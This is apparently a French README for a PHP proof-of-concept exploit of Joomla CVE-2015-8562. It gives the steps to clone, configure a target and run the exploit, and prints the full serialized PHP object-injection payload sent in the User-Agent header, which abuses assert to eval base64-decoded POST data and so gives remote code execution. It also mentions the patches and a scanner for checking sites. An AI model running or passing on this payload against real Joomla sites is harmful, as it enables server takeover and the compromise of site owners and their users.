
Une preuve de concept pour la vulnérabilité CVE-2015-8562 de Joomla
Un proof of concept pour la vulnérabilité CVE-2015-8562 de Joomla
Ce PoC est une copie quasi identique de l'implémentation Python de Gary hébergée sur exploit-db.
C'est très simple à installer :
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
Une fois que composer a tout installé, vous devrez modifier $target dans exploit.php.
Après cela, vous êtes prêt à lancer :
php exploit.php
En décembre 2015, une vulnérabilité a été découverte dans Joomla. Elle permet à des attaquants distants de mener des attaques par injection d'objets PHP et d'exécuter du code PHP arbitraire via l'en-tête HTTP User-Agent.
Cette vulnérabilité touche toutes les versions de Joomla. Un correctif pour les versions v1.5.x, v2.5x et v3.x a déjà été publié.
Si vous utilisez PHP >= 5.4.45, >= 5.5.29 ou >= 5.6.13, vous êtes tranquille car cet exploit utilise également CVE-2015-6835.
Nikos Verschore de PatrolServer a rédigé un article de blog très détaillé et a été d'une grande aide pour comprendre cette vulnérabilité. Vous pouvez utiliser leur mini-scanner gratuitement pour vérifier si votre site est en danger.
Voici à quoi ressemble l'en-tête User-Agent envoyé :
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}